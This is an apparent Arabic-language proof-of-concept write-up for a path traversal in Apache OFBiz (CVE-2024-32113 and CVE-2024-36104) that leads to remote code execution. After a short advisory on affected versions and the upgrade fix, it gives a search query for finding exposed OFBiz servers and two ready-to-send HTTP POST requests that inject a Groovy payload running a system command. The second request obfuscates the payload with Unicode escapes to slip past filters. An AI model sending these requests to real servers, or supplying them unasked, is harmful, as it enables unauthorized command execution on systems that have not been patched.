
Apache OFBIZ اجتياز المسار المؤدي إلى RCE POC[CVE-2024-32113 & CVE-2024-36104]
اجتياز المسار في Apache OFBiz يؤدي إلى استغلال تنفيذ التعليمات البرمجية عن بعد (RCE).
ثغرة عدم تقييد اسم المسار بشكل صحيح داخل دليل مقيد ('Path Traversal') في Apache OFBiz. تؤثر هذه المشكلة على Apache OFBiz: الإصدارات قبل 18.12.14[غير مشمول]. يُنصح المستخدمون بالترقية إلى الإصدار 18.12.14، والذي يصلح هذه المشكلة.
app="Apache_OFBiz"
POST /webtools/control/forgotPassword;/ProgramExport HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 127.0.0.1:8443
groovyProgram=throw+new+Exception('id'.execute().text);
تنفيذ
idباستخدام Unicode.
POST /webtools/control/forgotPassword;/ProgramExport HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 127.0.0.1:8443
groovyProgram=\u0074\u0068\u0072\u006f\u0077\u0020\u006e\u0065\u0077\u0020\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0028\u0027\u0069\u0064\u0027\u002e\u0065\u0078\u0065\u0063\u0075\u0074\u0065\u0028\u0029\u002e\u0074\u0065\u0078\u0074\u0029\u003b
